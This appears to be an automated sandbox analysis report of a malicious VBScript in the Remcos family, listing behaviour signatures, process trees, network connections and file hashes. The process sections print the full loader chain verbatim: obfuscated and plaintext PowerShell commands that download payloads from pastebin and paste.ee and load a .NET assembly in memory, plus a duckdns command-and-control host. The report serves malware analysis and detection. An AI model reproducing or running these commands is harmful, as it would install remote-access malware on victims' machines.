Analysis Overview
SHA256
83b9bc8d2f4ef6a85965de118a374157d1054dbfb5a1f57bdaafafaa3ec07f11
Threat Level: Known bad
The file target.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Obfuscated Files or Information: Command Obfuscation
Suspicious use of SetThreadContext
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Runs ping.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 21:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 21:27
Reported
2024-11-07 21:29
Platform
win7-20241010-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bs☹HU☹bwBy☹H☹☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹e☹Bt☹HY☹bgBq☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gc☹aQBr☹Hc☹eQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZwBp☹Gs☹dwB5☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹VgB0☹HU☹d☹BQ☹C8☹Z☹☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Hg☹bQB2☹G4☹ag☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹b☹B1☹G8☹cgBw☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\target.vbs');powershell $Yolopolhggobek;
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$luorp = '0' ;$xmvnj = 'C:\Users\Admin\AppData\Local\Temp\target.vbs' ;[Byte[]] $gikwy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gikwy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/VtutP/d/ee.etsap//:sptth' , $xmvnj , '____________________________________________-------', $luorp, '1', 'Roda' ));"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
Network
Files
memory/684-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp
memory/684-8-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/684-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
memory/684-6-0x0000000002240000-0x0000000002248000-memory.dmp
memory/684-5-0x000000001B670000-0x000000001B952000-memory.dmp
memory/684-9-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 5dfb72bbde909d6b93674ad24d1883e8 |
| SHA1 | 3e691bb3f7ad1083f4e40f6b45ba741148d61374 |
| SHA256 | f81cea62559b485c8b2929b363d390eb389a8460c2c135884c8175cb7c39984c |
| SHA512 | 2e8e8a408575c1ee7b30449001c873acba66ba90446da3d2f7c09366e0a09d19b54224fd281243890c409faf1f9a55a76f8b8e2f1abb4ba0a2e22a63109990da |
memory/684-20-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 21:27
Reported
2024-11-07 21:29
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Remcos
Remcos family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2080 set thread context of 1520 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bs☹HU☹bwBy☹H☹☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹e☹Bt☹HY☹bgBq☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gc☹aQBr☹Hc☹eQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZwBp☹Gs☹dwB5☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹VgB0☹HU☹d☹BQ☹C8☹Z☹☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Hg☹bQB2☹G4☹ag☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹b☹B1☹G8☹cgBw☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\target.vbs');powershell $Yolopolhggobek;
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$luorp = '0' ;$xmvnj = 'C:\Users\Admin\AppData\Local\Temp\target.vbs' ;[Byte[]] $gikwy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gikwy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/VtutP/d/ee.etsap//:sptth' , $xmvnj , '____________________________________________-------', $luorp, '1', 'Roda' ));"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.173.17:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 22.142.166.185.in-addr.arpa | udp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| US | 52.217.173.17:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 17.173.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 200.187.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sremc.duckdns.org | udp |
| CO | 152.201.184.235:2404 | sremc.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 235.184.201.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/2072-0-0x00007FFB290C3000-0x00007FFB290C5000-memory.dmp
memory/2072-6-0x0000021B2F000000-0x0000021B2F022000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tv3cdgv1.j11.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2072-11-0x00007FFB290C0000-0x00007FFB29B81000-memory.dmp
memory/2072-12-0x00007FFB290C0000-0x00007FFB29B81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dll01.txt
| MD5 | 1a215af591b42d73d0254846ebf5ef21 |
| SHA1 | 3a8f8d81abcf9c65a62c1bc043e669a6894a0177 |
| SHA256 | cdd976e886d1c89734decad2d084c76ee8fcd54a652195114478519af8bcdd18 |
| SHA512 | df7c33b6bc1953f9c859793d707aec6f2ee8dd03c7ad8e1437f448567961e254f0864cbc363528a30b994c6dff6e9a0d156290432053bb56d55e0da3b3b42ea3 |
C:\Users\Admin\AppData\Local\Temp\dll01.txt
| MD5 | ed284d77b4400b2bcf8b0abbda2c8f90 |
| SHA1 | c9f8e86ac04eef36be0e46caf815d33afa743756 |
| SHA256 | c9b5f3f368d8497c092c270328f5ffc136121415190062b5a449ce4ecaec4ecd |
| SHA512 | 459808753f7a6f2bdbe145c56ba1f0fa1e7e92afc6fc4b94c3a7c9627598347f73c6e38aeb7ecac2d298ba78e0cdab9792a47ce9d9f36e1b975b857f1a421437 |
memory/2080-37-0x000002568A400000-0x000002568A416000-memory.dmp
